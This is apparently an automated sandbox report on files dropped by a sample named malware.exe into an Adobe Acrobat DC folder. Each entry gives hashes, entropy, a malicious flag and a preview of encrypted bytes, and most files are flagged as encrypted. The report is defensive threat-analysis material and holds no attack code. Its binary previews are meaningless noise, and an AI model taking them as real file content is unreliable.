                        Preview:b.....Xw:.Dk.&..J.....6.....]...z$..d.l#....f?..aW......@.G+xC......8..UJX..Th.u.A...B.w...\......]|.....j....L...1.p/jW.....'.".P..I.a:y....y...Q.Iod.#...6\+.K...z=....%...h.:..M:...=X...v.]t.p..r.x/..o.....m.....e.!ZB%....QQ..f..[p.n..j_.M..3..T..*...^.F.Mj.z@^..H....?.X..m~.j@.bD%.<........Ro.....L.g../).x]_..|..k.k..7..^>...|RO7..<.&{..P>....5^;...X........z<l.q6:G..'...`.2(6.7.Ik:..T..P.[bX..+.Q.....%.2...T...q%.K1G..?...%.f.Q..y.WLMR...V.N..?u.3.z..e3...U..ybA.-..Jl".[x...-V...#......A5d...~.[..Z)\..........#OJ...x?....?.......N;...M>f.K.k.(.H|.../..k>..F...[aR.!.&..sh....|!Z...k..(..rw....bF...G2...d......`1~\..Z.qR.OK....#..u.fVHi-o.$...}...V{|..W..I..r)T..<x......i.$L....0.0<.....d...jlD..v.....e.:$.W.b.b...8..NS.Y.'....#:W.H..>.s..(.}...a..#.W...n..N.....!....X8=........Al._......j9;.f.b..T..M..`...q=..q...e.p.6...M+..#b.Z....?o.~a.......D...oP.......ps...].E....I1GT........r5B...>...<?-...W.a...?.Y.f....x.Ngx...8T.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):918617
                        Entropy (8bit):7.9997513863982395
                        Encrypted:true
                        SSDEEP:24576:PGg2BvcLVl329BglWTbKAfqtv88Umf/EN1KA1od6r:R2RcHgggKhWVmf/uUAids
                        MD5:048632DC664F7645B513E9DCE2660BFF
                        SHA1:EFFED6E54B556DF54E12E62D8D9AF6ECDFAE7156
                        SHA-256:957FF41540988CD0951B4239BBC4C580819179D95FF5A24C30BA86B1C0980484
                        SHA-512:6E0636328344FF86B0C7712B07EF760E7F33DCABC55EEC712869BCC11F224684953ED162ED953F2EA713DB02DA7DE595AF9F9BDA7266E8ADBD37DEFBDEC3521C
                        Malicious:true
                        Preview:..n.........f.d............7.@..1......X..L...|3.4.N..c..."X.^..=> :O.$.....9.B@....I~.9._..!..H.NH...c......&.2./....i<.D.....S..*.C....^=..M.d!}..]..xTB.[].V.. ....l\.oCl.....i..y..i..f..I......GY%..;}..m.#( .V..5...9...N.a.......?..btY.....k$......X. ,.H-.o.C........W....].Y8....Md......g.......-....lUH.;.8.*.......!D_.7(G.).{3l"\.fQ\..A.,.j...W...V....oK.z..&.t.]$.6 ..Z.<....x.f...J............IgV.A^.Erf.8.'o...&..Q..........>&..@$d.#H.sV..8..s.t..m@`.....k.s.._.06...T8....|...p.~Ht?.:..dN..~...@B..../.{....4.........F.......Z2q.....k.[/.......;.Ep........./8...=.5oH.Tl.E..\....g.&.....ST..\..+.2.sL...!.0.....u....".;...q.|..c. ...ak.$.8..`.a.~.\X..).Mk.eG\\_.q.........-..&.D....>...'...Ep...S.Y&"A.b..oO......J.p...F...........\.~<z..V.q.......i[n..f....Q...p.....@...k.T..]<; )..[..5..A...q;....nGX.&A...a...6..L....C..p._...$q.p+.C'..tNq. .@..,.....&wD..X...I..zt...u....K.*='./...'...#.9....iA.Uc?..)..=}&.3?.....d.K.f..<a.=.c}A.1.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\icudtl.dat

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10451148
                        Entropy (8bit):7.1896364233028285
                        Encrypted:false
                        SSDEEP:196608:Ss4Jdh0AN2Bjvx0U3OliXUxCGZHa93Whlw6ZWC82bD+pULSH0:SVWBjQliXUxCGZHa93Whlw6ZWiDQUo0
                        MD5:6E9C08C2F8097DA6FBD9F36E1B90F0FD
                        SHA1:89B34063F742727B9278A55ED998F94A1186179E
                        SHA-256:B8AA9FB7A7CCAE80DA1F640F1B4291D747379EE0865873AE6F657B8941FE7F36
                        SHA-512:C6B5EDB42983CC7794E5D5DF7F182CCC8EC6830ABF55483EC6BB167357E1D2768E8C4019A06E969BD8615AA757EDF5E8DE71F144F14A92DD050F42C3BB333B56
                        Malicious:false
                        Preview:..n..U.4..&?.a.d]..BT..._9M"..%...+/.W.P.M.....5a.~...M.S+P.F../T....q...p#t...&...=.]q.t...K>..0........).....?..0....\p.SF,v..D]xz.>i.6u..........7.i5T\._.k....n.0..OD...p.h[C....l.ON..EGk.,...4n.:|p...:.r..I...Y......x....A.@.4..6.......'l...]4..4..B.0..~.u1.:..........~...;:.S2W.W..yal%<k..f%B.>...8.]f|.V%;.+...B.Vu-.|.j.G.....:U.c!.u.$B....Jg.....-9nD..(..Av...r.uY'.I.1....E.'..{..4.....n..v...\n...d9..#dp:....ej......~....F].........b#.......Ka@?.Snt&......-U.M.09...8&.R....JsFH58.:..T.@.D.A.&#.)..P:.G?..~.9y.e~..k.'..10.....$.'.....OV.t.x.yz.2.=.7"SC.'.......5....)..R..!G.Kbv(.....Ny>I.7.|..........p...$.....|.q*h.....kU.].=|O-...Z...d-?.W.5.P..'Y.M..........1U.g....e.&.....X.J.:..B.xT.jd...b$.A^.0..%.........g.....g'|.Ge{...\A....v.iy%...e...8v'...GA..~.2....!..&/RN..$fLPj.A. ...........^V..I.l...a...?..z.~.e4..... ..1.~..d....&q .i:.:......5C....%..#l..."(.2`rk.....ot.||...U..(Y.....O......ZTf|....<c./...c....i..S.}.g.8...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):341062
                        Entropy (8bit):7.996086248209548
                        Encrypted:true
                        SSDEEP:6144:ForCadGG2Fy4UoMQXLj2iWTauJIh+fNgOs20urfm642FuK38C9EzykWgFzWpyL:M/d52FdMuHnUNZs20urO64UPNu5xzWpY
                        MD5:5DA19EAFA436D8B7173D483FD3FFFDE0
                        SHA1:21D6AC55FF1F860D5699E962B49591A3FF51B49F
                        SHA-256:661D1629030443DBFD2C0901E9DFFEB8526E5EE52D1A9A90CCFCCC02A64DBABC
                        SHA-512:B7DEB51F7A30B89E9BE2CD79E4B40DB861414CF8E26BF562970EC18C97BCCFB5641398783132B9C1E72F244BB9368D433D40B3DA84D14D094142A160C6203E70
                        Malicious:true
                        Preview:.A.?.r.....4/.?.fh.....h....!.-..lN...b#...}r.]z...~p...g.$.Ug..M%.X.c.k.T..).ZZ..-..7..`....:...CU15P...!5BbQ...6{.i...e..~.......8E....#l....cV.R8..p....l.3=*.6.........H...P..=....s}.{g.("o.X........E.Xe!...G1}....kO3q...C...;....BdJ....+..h?8..C.1.+8..Qh....pLbZ)..F.Q.......5...{C......R[.x\.i..h..l.$n....~ow....&v.!?..x....8..rFE...E...<Qp..Q.\.&.>..C.........y..Ej.....oN.{...RJa.....WYu0/.,v....!.54r.."....=..3...+j.?......`~}.o86FU..Su.O.......W..^Q.6.dV\..r..........d.K.,...s.^.g...4.`.h._.3^........Qs."..*..Q..s....L.Ya......O....?....=d....x.....o#.=..../....['....9..x..._..H;..Xj.K......F..H.J.....&...UQ..Je.;G.?.Xa...1.....h.7.}L[.]1..e5g.<...:.dS...TWMB<...x....E....bd..M5K!.6.....E~E.e.].m..U.91.Ei.ev..q.P...#.l4..!M...A..d.7.R.k...zY...V6.Oj..Ubl..L.p.#S.K......X.C.l...g..F...`1Q..z.U..\."D2.?...n.1..U-G{...,...79h......wE..^....L_........cL.A.g.$J....t1.<T.S].A..Qx...+i....K.7#.........O...f.C..ve(..].cW

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\resources.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7420968
                        Entropy (8bit):7.998546316518815
                        Encrypted:true
                        SSDEEP:196608:89CyZCJZoH/XygU10wmzfO2Ukdrrl4eGbyw4:89ZuZ8fwhQO2/drJPGbJ4
                        MD5:4C52F2F125E0C8E587AD5721B45D6026
                        SHA1:92DD80984669B1C55E576B524B1528561E710057
                        SHA-256:4EC5BFA61E407A4C35B71764FB53AFAE74837ACFFF9A05446CC756FDD1124B5C
                        SHA-512:4FACA131E1C0D6DF721E7BDE49D82A8DBB7487B94726FC073C7E7B244B66D6E97C5630C23C313786B7BDBB49CD809AE8F49907236C2A4AEDAED6A9692C7C9263
                        Malicious:true
                        Preview:O0...(r....[4.......D_....SK...P.....26..G.g...dj.._....s.j^A.C5.[.J.ip:.|I....,...bT..d.~..[.."O.^hI.w.^....C.wI..B..>%$.XD...o....v.&...K../~{q.R...5......I(..v........e..~...S.7(5.CRFx.*....8W..>.........G{Qn.C....+I.........9...A.[........t...z.Q.Y.E.'.......(..U...M_.'.D..#}j.H5..}....E.....|Is2^-5.|h.g.3^..W.yLGJ..TEq.+.@RD.=.....CQM._[..T..v.B......T0.O..{..O.^.S...iP....r.. ....8l.F.....}h.1^1.............kj...&.C$l..y.x...e~M..._...H.8..`.7h...Ow!...Y...+...$IO.[.r..~.k.'..]./......a..'.v~.pD..i.....5.....0. ..H....<O...pj.(.rs\+\..Es....k...9...\g...6.K.'....D....{..........w:DM..%..D.L;..MjM`..>...0.;..g.?.l...[.mx....y.K..0..4....b.m.........!FYQ.1....Y..K.....8..^....?.2J.p..'..I.4.d=...a.O.o.QC...a{..Gf...M..D.....2....6..\,c......e=a.+..g\.8m.9.m:.t..g...mBF.=....5$W.P=X.K....u<..-*h2.D..1.k...&ih.*|A..2Rh|)..#aZ!...}...;%rZ.@.#.g.T.L../U.X'....r.G..lo..v....U.a...\. z...4.._.vrb.y..pO=T.:;.z.A`_...0.;~.=.......C..].......

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Bold.eot

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):314124
                        Entropy (8bit):7.996619164520944
                        Encrypted:true
                        SSDEEP:6144:cUIWdVJwZSugiIjoPgUW0cij2M2zWvmZ0l7ZgNpWwVBXh4h:9w4hxUnZYM2zWvmZ0l1gN4wVBR4h
                        MD5:454BFFB75738AB16F934CD93A524C8B1
                        SHA1:033E4BC8807DC75E2BEB59087B308F2A1FBA94A9
                        SHA-256:EFCF848C6C85C7727654F5B949E39A9DE6BE771B0907BDC63973EF6C90796F32
                        SHA-512:56D95EED0DB595378C1329A16CFD4B5D4F66D871B8D5DFA38B408FC0BC4A7FB4012A534C24C92B6D13235F6DDA435A840F1423671503808A92068D9ECAF37089
                        Malicious:true
                        Preview:,.D!p..j../.(n."0.....A..Y.9...?..L%...]..l2.NE_.8...3M,....W..c=.d....2....[....h.3F..M...<...O.._..~...Y.U..^?......h._.E.....X.|..Q#Q.0.sWR`....^XuH..:...f.hx|.{..._or<.NQn!.5f..).[.;....j.f..M. .Xp..].~....0......ts..:...x.}v....-...o.c..*N.n..N..e.:..==3O.V...tv..[F_..m.>....m.g.b...jJ9...-.......dM.x.4..mg..b.0...8.G.'..wY..sZ.........._._.t.D3^...QF'.1...NcI1.W...H.q..m...i....b..8.8t)!Tu..H.O.EI....p.KO!....T.KZc...B...3...G..^..#..^...f.(.....6.k..~...u.....{.j.1h...a..bh.o:......%o...d.......V`...=g.Bb./qpn.......%..k.V.......i.F9.......&....>Q....c}>Sq.]..$/T.#..8[B..d.P.W........8X<....?]$.....0....Y6.aYK....,..>7.....j-.!.+.)j.k.....[A..Vh..%M#.jV...5gy.0....e....5..f....-....|.>....!.|..9!.G..HJ...d..>..Y>g?..M..........{PN/R.tv}y...../..".cz.?C.....g...q.V7.....W...F..&..y..L.U.~.va?@.k.o).~x....E..Rw.u.E..06......s...g....b...r...q.;@2....;.'.Bt.5.4.$[]..e....z....F)C.......T...M9;&..........N.&.ER.../'2<.0.......Jf..t;G.!..E-.vX..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Light.eot

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):322472
                        Entropy (8bit):7.995535898974767
                        Encrypted:true
                        SSDEEP:6144:xeEBengJBvogvzqiJcJDq8RXBAfeEEMU4EBiW8FBbsTRT6sRlJ5tTPXH2v:xJBengJxogvzqiJAqgXyfeEEMyBtyBbd
                        MD5:5F6C22F93F8DA7BA3E26EE8D59A46FD6
                        SHA1:0D668531F19E0D82EF050C391A78887CD85342C4
                        SHA-256:F7D23CEEA36550C60E0D4C345C8F16B275C8475DBF2C449DF6BD102F3D5C7000
                        SHA-512:60484D4AA3A4F3CF92996056A158561CB02CD6DB88EA94B81D23C845241558FFC2C36FBF503D0D4618020F393C1161A7A5B540B62B6B14B6B8DB194BFB95C9EB
                        Malicious:true
                        Preview:...{Q..S 1..c...j....H(...x..b.d.p{...%..&.....X..0N.B$=}...,\Y..5.D..~x.+T.:....|y{....8...lnX..;.`..[=3m..(.G..........;...$.qS...T..X...g....?..9F/e)..j.....c{u9.lc:......Qp..>...iV.>.......d.~. .W..s.W[..!oV_.Jkj.`..+,.E..4.j........?\9...tz...h.K.h...V.0N.[..$.^..;0m}.....O.....+.K.0.{x)..._r....IA.v)Mj.....+...v. ..-..R.|d.y....v. .8a..9.............c.s.v.I....k_...i:a...... ........^..@.e(F%.6H..=.)3T..8..E..28.el.....W?..........D.e2......3..$..o....5.2......J....pc.h.+8........p..%Hh.............Yxh7..[..B#.^.....)...)&....'`.R..X....&..W.*...D........-...Mm..5...N.S...T.l...._.}(..0.b%4..W......q....7.f..^l..M!y..`'......i.&"U8G...8...zP...:.|X..".v.zJ...3...>..{.1.7.0..b#%.w...4.t..^Tt.&VU..M.[..?.2T........78.I.u.......$.....U..3..<..!..@.T.f......*.A...]..Y.m.OV:..b.~..5....F.j^!...7...>}.H]%..W..}.3:.%..'.R.......nX...)...'7i..#.f5...Tw.-...{..r..VaP.H....+U,&.!.1.../C@....6.....L.g.y@.62).u..D.$.2...\!...<Do

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Regular.eot

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):326204
                        Entropy (8bit):7.995915223343165
                        Encrypted:true
                        SSDEEP:6144:ZHKxy3lcUzASCZrJmV52Qa16P3x35GQIS1n:Zqi+UF+w5k6ppGQvn
                        MD5:6316451205F005DD7ADBD87BC3B51A9A
                        SHA1:06983FE61AF0F252520494EE8C8E9E87E19C2095
                        SHA-256:0DB131739AC68F3502E6D6C4C965DB9BAF57D6A340889356470B7AEBC227F3BA
                        SHA-512:B42FB79E97EBBF5449D39A0696C450F1AAE2DB1B7DBF8EA253D0DBB171DF9012EBAEDF30A40D0383CF34940B0673DE3CF51F88ECBAFEE738ED61677B48EF4391
                        Malicious:true
                        Preview:..C.....Q...X.e.I..vfY.zD.'.Z .1.......>.cn;.?.!...L.E...J.y4'..0.AfA..+L.......U....E.Po3w.'.P?..w...4/.)d.y....{.l........*W..o-........YCq.JkF.%...N.L..5#..@.O2.#3...i.p1..[...to...J..r...4...........'$..s.j./[F...D=.....1.)..6...|.p.M.^4.`YIa..ZY.0n..p......#i.a..Q...L8..d.0qz.....q15.{.>..q.Y^p.).........3l./U....1.f......W..B5\..0..mI....J.....6..nf...|.{%.......i..X-.G...Y.~...&S.e+.[....?[..1A.....U.........h.Lv...U..TN..%..`;..W;...`...........(...c. ..^[V.i....Q......*..[....Z.f...ln....z."...a6..(...g.b..a|.\ .N|.+>....Y..z...'P_dc%X...3.8......'.>...Q..l..Z..C..H.<..{A.G.w-....'.........Q..Z..>$...k^...Y.\..Co...+..Iv...j.._A.N3.~......x.Rc.U..a..G.).t.....F.+....e......x.j...5..@4.I...!9..Ww[...H.C.....+.}T.}.;g...+..Wm(...N_...k.}...*/wR.v..+y.\.G..~.....\.Q[H.W.V.,~....H..C..I..W..].X.U .r.w.eYd......&%n.3<....;..........<.....Mf.,...Q...;t.....t.m#..q..90.Zgu..5(.w.X..............{...Z...z.r*+o.TZ....5."s.v....f.|...y.-.?a.-.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Bold.woff

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):144476
                        Entropy (8bit):7.998655023383189
                        Encrypted:true
                        SSDEEP:3072:Q5qOswiSGtE/+BarzuuOn61VEx4eoT5zy2Cz:IqtSGtE/vrzu9WSx4hT5Sz
                        MD5:8D189EBC9B97815221D87D3325621E3A
                        SHA1:72B0B7B53883E4BEC2E0B7D38B2B0D455C700CB9
                        SHA-256:E9317F6A87B785FF621A71B4636A7AB50B949204291198BD1D2CE9D9CAC17B51
                        SHA-512:D83131601878F19BB0A59E5C388FF038C2C562B8B35E1D0E5587C9FDC1725B7C2E230DA00CDF6C02C652D2348F2C71E2642440585426AA8A6CE43212E7B1CFE8
                        Malicious:true
                        Preview:.....aD..S5EL{.'.MH..N..`.;PS..b.....9a.Mc....0...D.b....U^.n.s.e..5...:...E.`.r|...95t.[*Z..R............>`.$..?.B..h7.*......0....%V......FV6-.6.~@.`...L...5...........l.q..V.r.A....tX&q......*.-...3M..:..z....y7..}7.rJh..b.'....x...K....vp[.S......86..`....}u.&..B..i.DEA..^..RN.A2>........08.....aQo[.',}M....2.=...B........*..@IwEK..;l.....>.O...$>.>.P...R.uL.?<Sy%.fR.......S1.q.........c...,.\.apuQ.......G....aY...s......p]b.|.*...}..P....K.........v..e.!/.U.<,.0....B..:....I......o}..<.....x..US..1.f..`*.&<'%%...z...|....U...@G........qt-..z:.0.j...W4..:...^..g.^...L[.d..T.[.v...YB'...#.f.H......r....`...h........Iz...G......hf~.C..z..|J.{O.......4}p1.{..<2d.h.....')....J.'..Z..e.<.5..&..H...K..l..:...H.d.E.Lg..Le.W...k.x83.g .V....R{.D.....z.U7.5A.m........4..m$..]......".;........l.;..q..m*......A..... .<0.+.......#g...8.>.....F...!..Y...*.fy0....%.Y.B.B....x3.#.......e...Ix..[..._..Ma..Cxaw.x.S2JCE...0.Z........./...<d....}..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Light.woff

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):145272
                        Entropy (8bit):7.998749034167796
                        Encrypted:true
                        SSDEEP:3072:sg1rOk9DXcXabTm8BFRuy3F0upsyUnyN23VdnwoR60+kmakg:FP9oXabiEHuy1fyHyNAnw86FWkg
                        MD5:BF44AE43B3E05BB3915F8F033F9B3D3C
                        SHA1:A8CE6CED3A3BB216044B504A55AC5CAB9A96CCA3
                        SHA-256:E7B17CDBD3726BD52EA28D65E879AC2C7091388729547D0E51C7662106D40ADA
                        SHA-512:9F80831AB5C2CCEFA4C9DF0F5AD4C8B1B8DE68DFB247217999198D92AAB458CA22710B2CA0D0E90663CEC3A6A806EB656E5EC5CDC8A127A86AE2FF8BD39B507E
                        Malicious:true
                        Preview:.....1..;b;[n.9T...fv.. .[..&a..4....k..xZ.....k.2_..d.lE.......I...C$....S.n?[..y.../........M..dp.....&.81.F...r.X...T>y!.&....Np.l*@d."`......uPfB....0.@.S....}.p|..V,.B....0....1*.Y;G."..........d....;...]v....p.....`......l.L.....d...=......?|.....e..Lb......I..s7..H.]......ZW.2..2.6...<....H...P......B.p'u..m...>..Rd..O.Y.t....E......2>..!...H.4.)..fIy0.Yj.4.$.!Z`..z..k..#M.% F.5[.g......P.Qla>N..fH..?....X..H..".....~..{R...hbE@8..$.."..2$..).?..K..Wm.I.]|$.s.T.F.%=.2n._.qfo...M.K.4.N7`...6.......I*.eyb...3.....f.'U0.A(.d..P.\z..d...3.....5.MH.o.*..#....N.(._.p.'.......-..~.g....._.....Jv.M.A..@>(.q=f.M@........../.m%)..T.E6.g*..E3"..j.?W....Ryi:..o.q.h.lk..z.P{G.r.....am..)`..../.`,mA..d6J.gv5S.C..Er0..D.X4..~.H]`..F.&.....j.......*m..)c....Y.&....(.s...2M.2XU..?.,.........x.g...5rb.,...2+.....a@........0....R..1.i.b.q..@D..S..R...c...2.?.8!u.............r.. ...].t.. ....Z........M..y.......n.........>..`4..R....h...8..ct

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Regular.woff

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):145584
                        Entropy (8bit):7.998727361523292
                        Encrypted:true
                        SSDEEP:3072:uipzBZmIF+AXLtyFIX6aOfy2aEVaoGKSNmBRcrl6Yf5CyyH1:x+IF+4JFXzCy+aoGKSNzl6Yf5R21
                        MD5:07643825933259C0DFC0DC78AECDAA99
                        SHA1:2F06EBAE5D910B6F9EBEBBD68D2286A5B94E5BA4
                        SHA-256:9A2D85759551B027C68E55C9C7C7A1703CAAEEC1F2508F117E7AC3F4134625BA
                        SHA-512:3A315ACA9A3BA41734B872E1B39544442A667BB567FAC17E68313653B546D55F065175DCDBD10522C843EC011ECC0635F0C2A87005C570B500A65614CC9DD4E5
                        Malicious:true
                        Preview:...d..~.*.>..{....<DlVy."..C......t....[.m...d....I.L.....O.O..=.(...t.(.2(%..+[r..7..a$b..._.M......m-...2..w......s.Do.C..0.F.......a$...:.........ft....3.N...8..T2@.6.D.y.....op1AGy...G.....e.....">O..`..[*.........h).9P.[0..B..Wn.>D....t.3.A..+...5w.o.x..}0.............d5.+..>.......g.%0.wo.|..^R.(...q..^TE8..P.d.p.$0:....}.:l.!.!.V..0e<. RC..~o3.].v8.......T...0..../.t.k..Y.....1...~..@$..>\.....s..m... .x{....He?.6..@*..{...:.xT..*..X......|L.D...dx~]p..=....o(.pe8.e..w.+ L.............X....k..td..).;.{\....[z.).m.......=..u.....8..xm..Kjo.n.........xH..^.v1.g.].2./..\..h.CS..1....a..U.%'.IW..5w..!..B....JX..^D.Er_2s.=.A..........)...5....E...^..'O.....w.."0`l...K.....Fyk.[.I....UAg...{.......o.....m...;^...H..........t..Y.._.......R... .|jTL.".N..F....$.9./.hx.......4N+&+.5../.-...n>89.T..c..6.8...Q.d.2tjV.....m7..6...H....K.N..UY..U.....c..7...Q*df/..4...D...;.J......}u.^...asz....sL..lkZ.RF...Wy.0...&.c...xiH......+...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\index.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3050618
                        Entropy (8bit):6.998650324970897
                        Encrypted:false
                        SSDEEP:49152:30+/SWS3QgmX/PrC4T4NOVRQdHwSqJobnl:t/fzga2e4w6l
                        MD5:281996F2654667335283D4C6628682F6
                        SHA1:86BF14C5EE8F51FF1D48E1704035B89F0057661D
                        SHA-256:1B7978D37CCC9056E57A70DD6C851D5A7C135B33CB1E73198F16B06D285F5B24
                        SHA-512:2C34F0CD636D341950902973E76618F03B94BF11CADD2524E92EB0B6FD685C577127046940D8D0FF0D22AFE899B0AF095760A6F962FF1312277BA2AB12932B45
                        Malicious:false
                        Preview:..(.b.g+.?;..j.j.B...\-.\.y-SJ|..........o...j.P{.+...;.U...X7).i...+9..I.2W....P......_oY......&....o..:qQ...#..x$...U..nF.Md...I,..U*3.."n...H..p..[.7r...AZ....`..M...IX.) .>.........yVV.@.f...:9...WE..4.....\.......'5.(....6Q.K......o...my.q...'.0K.>.^.A|........Z.#_@.O.2....M..r1.8...Z.......'......>.c.._........xTR.Y*0"M..B.....9...ur.ZN....po..^....O.}......+.;*..N..4R1.....U@IY0.......(.v..0'...J.W.F....x]....-A.7...:..P..+L!:"......:..Usz..[.=..n.)...G..M.@."..*;......9........l.\ .".}.6@....VZ....T.l.3D.Z.,..&..KT....k..-.W...........Gw.@.{..).F.H.u.].....n..U..0.Z.j...|;..j.....~<.)...p.1...._...!....q....<....{.$+..2.-M....l..&.C.c...v.,..]W...?V.......>.Fnq8|T.....}..<..;.b..P...,..q......y..k.$.+-.:n.@.....;mS...l..H...%&[..32.7....3...Z.S....-;....aD,L.4O.R|.1.!.@.o..-jXV.;..........b.....)3<z9..C.-).z....C........8.r.\..._...%NDX.r.]...s.9. .H...-..N=.%s.S.....4....f.T...c...!R....V.A.0G7hg.m.CL...N..9.a.p,.Gv..#.G.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\2d.x3d

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):791108
                        Entropy (8bit):7.997549354288921
                        Encrypted:true
                        SSDEEP:24576:U17YXib0NN5w6Q+OS6TSTpEx40myrQjEuu7:U1PS58+OSfWxOyrWEuu7
                        MD5:9C012A4EA92AD229BD6EB8203DB8F224
                        SHA1:DC74DEFEF7082CC6B6C2591F21D3A10971F9DEBA
                        SHA-256:C7E78B2CDFE4873B8CEFE0E9992151E835D44DCE94E771BDB7557BFF635DEF1C
                        SHA-512:0EB2BFD1E5A75F7A31E95E516C2860B301FCF0D5DC94A79A4EB956382174F81709F5BE57F5FFA0D2A87F2FF735BDC9CCE51174F88E791856E54BCAB813182491
                        Malicious:true
                        Preview:o1...\...c22.o..$.x.A6.....`.."F(....W...<z.!W..:g..F.].wZK...H..'r.......@.E.."Y8#.......J...j..[b...3..D.E...^i.4..F..*%.2}.I.}.t...x....y...l(...{.P(....y.d.p..%3.A.>..&8....^.......0;?...Q\.Xk....a!..t3..<.q...-.....a.{..\.....<...q...{ X.W..}G.h?..-....2.k.hS..<........N..r.g.R2..5..........q....y.......".j)+.aSo....I,C3.&H..CM........).d..;I.RC.|.-..l._...u"v...Usa4....C.Qn......W.../._8.$.L...ZoM.*...qm.Xrt.$(.f.B.}.v>........gy`Q.<..]..2..H..x..m.....J.Io....e..[.4.rM..}........[i./..Xl&jh...>."..v.qtYy..t....b.XQ{(_M.....#W0l...Y...Zd....?....o...GA........X.....j6^.ZB..:.MDY."...._......]=.vC^?yW...6....R=.?.O.!LD"..$6X..P..7.~........n.D.......Wd.S".&G..;.Bz..5...6...]3.s.~.P-.p..U..&%.1\............$=.G9..(l...-o...e..A...y.[.u...n..6.?...&....0...L9.@....,%ZD..+.5v....?9...K....a.F.././T......O;.D`..S..k..bk8........i..j...+..{g;;.k{.h$.Q..[(ML.c.....c.I...r_...E...j_.3...d(......<..OLY.....a`...9.....8.uQ......(.2... +.B./.kt..:..)

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\3difr.x3d

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):305732
                        Entropy (8bit):7.99732581156076
                        Encrypted:true
                        SSDEEP:6144:KcACiY6PNkEmZhknc6pJAjkz2f+WioPZRDP0jNVoO/zA4aH:K1Y6FKkd7wZmnoP0jLoqzs
                        MD5:97AB509284BBBB650F1590CFBFA341EB
                        SHA1:5DF6EE83806369E1B009EA8AC817055D02DF9EC6
                        SHA-256:60322693DF7E80045D5EBA53C3BC00504F09EE45CD66659FDD249ED6BD330E6F
                        SHA-512:BF4C4A32417DC4D66BAC4CD65B30D34E7B7AE7B617BBCD249973093E632292AE7E6F90D3C3939047912607781190E8B61BFEC9EE601C3DACEBFAE27369E38697
                        Malicious:true
                        Preview:....*e.........J.....K.T.4..k..7.7...m..%..|..v.$v~.....`..+p..A..}.q...P.. ..:...v..8.Ho.....v.......f...U..{G#j. .aD.s..uV..Yh.....6c.....Mk...8.<Y..3).F......r..i....8...;...he'..#.r..DE...Lb]..Fj.S#"......[...vf.k.H..W..X=.$.|..?.<./.....J;...(T.n.}..R.t..8.bU.,[..........d..3<../....W$+....C...=.<].(Gcv.U..t..."...Jj.no.b...C........F..4......_x..;n._Al .......n..G..:>M.jn7z..b.D....^...O.Q...$....]......A..@....#c+..?.g%....gw.,.t.SX\..y|.=%...u.....\......a..l0..N..o.^Y*.q$.c.G.. .(K~..f;.";.|.....q..nJk7...tgT...`G.^TK..H..p.$....$.1..%..k2.o=.}.....OW9..'.=.@...6t`.YF.{..L.DR.~ .........H...SJ.S...D.J.,HS.N...c..7Q...."...CUE..$..0h......E.f..........k.I"...R..!]..q..D.....au...g.+f.cd.HnYf`.8.E.h.x8..3K..bSD..'%H.L...u..&.2.?....RJLq...'.8T.....J....8.x8a4U....1..u.V.L..|hf/...1u z.V.!.....Spw.p..>..H...$(.....f...kn..r..PY..Za...XwLT..q...z..........%..9..y.j..o=)J...Nj.p3..(..w.p....p).2..].....8W*.*..G.f..S....I.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvDX9.x3d

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):456260
                        Entropy (8bit):7.9977859826771915
                        Encrypted:true
                        SSDEEP:12288:V8t59tL7EBQS6PeL5TaayHurpLqG6MY46f1tPQf0VT:Va/tL4BQS6PeNTL9LqRMY483T
                        MD5:C2EA9A5545018B852547AA356BC037B0
                        SHA1:BA071F515A37AC67B06DD56F6D9518A9BA0156E6
                        SHA-256:4B39DB143CEA503B189A812A77E6B5550ABCA4C87AEA4508068984A9A3D0F8D8
                        SHA-512:0D2E0E435EDF30DC654B04750358428FC9B9351AAAFE620E03FF093A6354C7166B2955DD48F54BA9E1883B48A66D2F7338015D6E57415CAF2469C1AE7C642FA4
                        Malicious:true
